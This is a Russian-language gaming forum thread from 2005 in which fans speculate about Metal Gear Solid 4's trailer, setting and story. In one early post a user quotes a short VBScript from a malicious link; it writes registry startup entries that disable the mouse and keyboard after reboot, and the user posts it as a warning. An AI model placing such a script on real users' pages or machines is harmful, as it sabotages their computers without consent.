1. Обсуждаем дальнейшую судьбу форума: http://metalgear.me/community/posts/123722/

Metal Gear Solid 4: Guns Of the Patriots

Тема в разделе 'Metal Gear Solid 4: Guns of the Patriots', создана пользователем Маркус, 18 май 2005.

1. Nightshade Kerotan

На форуме с:
    1 ноя 2004
    Симпатии:
    0
    Баллы:
    0
    Захожу по ссылке, и Касперский пишет, что я подхватил троян
    Так что заходить не рекомендую
  2. X_Tra DWORD aligned

На форуме с:
    13 июн 2005
    Симпатии:
    0
    Баллы:
    126
    Касперский, видимо, ругнулся на этот кусок кода:
    Код:
    <SCRIPT LANGUAGE="VBScript">

<!--

Dim WshShell

Set WshShell = CreateObject("WScript.Shell")

WshShell.RegWrite"HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesMad", "rundll32 mouse,disable"

WshShell.RegWrite"HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesDead", "rundll32 keyboard,disable"

-->
    Скрипт пытается выключить мышь и клаву после перезагрузки компа. Это направлено на IE. Ссылку необходимо зарезать!
  3. Mavrodius Мимо крокодил

На форуме с:
    3 сен 2005
    Симпатии:
    0
    Баллы:
    0
    Великолепный ролик-Кодзима гений...особенно порадовала борьба за стул "главного персонажа" и "Сэм Фишер)))"
  4. Гуру Philosopher

На форуме с:
    22 окт 2004
    Симпатии:
    0
    Баллы:
    501
    Интересно, покажут все-таки ролик MGS4 или нет... А то ведь инфа от ДжейДи вроде бы неофициальная (интересно, где он ее взял?). А если покажут, то на каком движке - на старом или новом (опять же, вдруг инфа неофициальная?). А если на новом, то это будет просто что-то типа тех. демки или же полноценный громадный ролик, как у MGS3 на Е3 2003? Жуть, как нетерпится увидеть... Осталась подождать всего пару недель. :cool:
  5. Билл Ichirin no Hana

На форуме с:
    13 апр 2005
    Симпатии:
    0
    Баллы:
    0
    А мне пох, я под Оперой :D.

Насчет того ролика - золотые слова, я аж плакал:
    No place for Hideo?
    No rePLACEment for Hideo!!
  6. Hatifnatten I hereby award you the title of Big Medic!

На форуме с:
    26 июн 2005
    Симпатии:
    244
    Баллы:
    1.851
    А почему в конце ролика когда появляется "Solid Snake in M буковка M перевернута и превращена в тройку?
  7. JayDi Мимо крокодил

На форуме с:
    23 окт 2004
    Симпатии:
    0
    Баллы:
    0
    Эта инфа почти официальная - от человека, знакомые которого видили ролики MGS4 и других игр на PS3, приготовленных для выставки TGS.
  8. X_Tra DWORD aligned

На форуме с:
    13 июн 2005
    Симпатии:
    0
    Баллы:
    126
    [Оффтоп]
    я тоже :thumbsup:
    [/Оффтоп]
  9. Гуру Philosopher

На форуме с:
    22 окт 2004
    Симпатии:
    0
    Баллы:
    501
    MGS 4 как зона боевых действий

Авторы PSM описывают игру, как "смесь между Rambo и Black Hawk Down" с
    Solid Snake, помещенным в зону интенсивных боевых действий, где артиллерия уничтожает укрытия, а помощники сражаются бок о бок, как настоящие. Новая 3D камера будет играть большую роль в выживании, сражениях и в поиске новых укрытий.

Интересно, и как же тут реализуют стелс?!
  10. Doctor-r-rR ***

На форуме с:
    14 янв 2005
    Симпатии:
    1
    Баллы:
    236
    Хм... Имхо, очень просто. :) Приблизительно,так как мы реализовали в DoW (см. сайт у меня в профиле за подробностями. ;) )

С чего ты взял, что "зона интенсивных боевых действий, где артиллерия уничтожает укрытия" будет таковой именно из-за Снейка/глав.героя? Может, он там будет третьей стороной и будет так тихенько, аккуратненько "влиять" на ход разборок первых двух. Ну я так думаю. :rolleyes:
  11. JayDi Мимо крокодил

На форуме с:
    23 окт 2004
    Симпатии:
    0
    Баллы:
    0
    Надеюсь, что эта "зона интенсивных действий" лишь фейк, который пришел в голову авторам PSM после просмотра ролика с Е3. Больно уж на это похоже.
  12. Гуру Philosopher

На форуме с:
    22 окт 2004
    Симпатии:
    0
    Баллы:
    501
    Кстати...
    Насчет зоны боевых действий. Я уверен на 75%, что она будет. Это самый разумный шаг по дальнейшему увеличению "масштабности" игры. Так, MGS2 - это то же самое, что и MGS1, но только там больше возможностей; MGS3 еще масштабнее: действие длится несколько дней, игровая территория - это не одно сооружение, а огромная территория; нужно питаться... А MGS4 - это новый уровень масштабности. И эту масштабность игре будет предавать война.

Собтвенно, войну нам показывали в начале ролика на Е3. Еще там был песок. Значит, воевать будем, скорее всего, в "песчанных" условииях. Сами боевые действия будут не везде, а лишь в некоторых локациях. К примеру, в начале игры нас бросят прямо на поле боя где-нибудь в городе, а потом дадут и "постелсится" немного. Потом опять придется воевать. В общем, будут "военные" локации и "мирные".

Ждем TGS, а потом сделаем новые предположения.
  13. Чампер Я ядерный, я дикий

На форуме с:
    10 мар 2005
    Симпатии:
    266
    Баллы:
    2.202
    Я тут недавно открыл, что в состав Window'ских шрифтов входит один, который я ранее не замечал.
    Называется он <u>Krystoid</u>.
    И буквы, напианные таким шрифтом почти идентичны тем, что были в ролику [color=red"><!--/coloro-->M<!--colorc--></span><!--/colorc--> в самом конце.
    Но вот что странно, с этим шрифтом надпись [b]MGS
    выглядит вот так:
    бува "<!--coloro:red--><span style="color:red"><!--/coloro-->М<!--colorc--></span><!--/colorc-->" "немного" не такая, не правда ли?
    Так что я готов признать, что Кодзима явно изменил формат написания таким образом, чтобы эти буквы были похожи на цифры (или ему просто не понравилась эта "<!--coloro:red--><span style="color:red]М[/color]"?!)[/b]
  14. Hatifnatten I hereby award you the title of Big Medic!

На форуме с:
    26 июн 2005
    Симпатии:
    244
    Баллы:
    1.851
    Чампер, мой пост в начале страницы.
  15. Чампер Я ядерный, я дикий

На форуме с:
    10 мар 2005
    Симпатии:
    266
    Баллы:
    2.202
    ЛТиМ, я видел твой пост.
    Может я его не совсем правильно понял, признаюсь.
    но мне кажется, что мы пишем о слегка разных вещах... ;)
    Я просто показываю - как должна выглядеть эта буковка "М" в реале.
  16. JayDi Мимо крокодил

На форуме с:
    23 окт 2004
    Симпатии:
    0
    Баллы:
    0
  17. dh Мимо крокодил

На форуме с:
    27 май 2005
    Симпатии:
    0
    Баллы:
    0
  18. dh Мимо крокодил

На форуме с:
    27 май 2005
    Симпатии:
    0
    Баллы:
    0
    "За несколько дней до Tokyo Game Show 2005 популярный японский журнал “Famitsu” опубликовал интервью с Хидео Козима (Hideo Kojima) и первые подробности о новой части “Metal Gear Solid”. Как следует из трехстраничной статьи, играть придется за Снейка (журналисты так и не смогли узнать у Козимы Биг Босс это или Солид Снейк), но Рейден (из “Metal Gear Solid 2”) вернется в качестве одного из неигровых персонажей. Кроме того, в игре ожидается появление Metal Gear MK-2 из серии “Snatcher” и расширенная версия Close Quarter Combat. Что касается места действия, то большая часть игры будет проходить в зоне боевых действий. Издание отмечает, что впервые за PS-историю серии исчезли восклицательные и вопросительные знаки над головами противников. Эмоции передаются мимикой лица и даже позой врагов. Игроки поймут, что вызвали тревогу по поведению врагов. Так как Снейк находится на линии фронта, то по мере выполнения мисси он может встречаться как с союзниками, таки с противниками, а также нейтральными группировками, которые сражаются за свои собственные интересы. В зависимости от вашего поведения окружающие вас персонажи пугаются, нервничают и даже просят помощи. Stealth-миссии теперь не выделяются на общем фоне, становясь возможным вариантом прохождения игры. Стоит отметить, что “Metal Gear Solid 4” в версии для PlayStation 3 будет продемонстрирован на TGS 2005. Все прилагаемые изображения выполнены на движке игры в режиме реального времени. "

http://www.gamemag.ru/pics/12092-mgs4_pic_1126708821_0.jpghttp://www.gamemag.ru/pics/12092-mgs4_pic_...126708821_0.jpg

http://www.gamemag.ru/pics/12092-mgs4_888.jpg

gamemag.ru
  19. dh Мимо крокодил

На форуме с:
    27 май 2005
    Симпатии:
    0
    Баллы:
    0
    вообще похоже на город и какую-нибудь военную базу. а играть имхо будем и за Биг Босса и на Снэйка
  20. dh Мимо крокодил

На форуме с:
    27 май 2005
    Симпатии:
    0
    Баллы:
    0

Поделиться этой страницей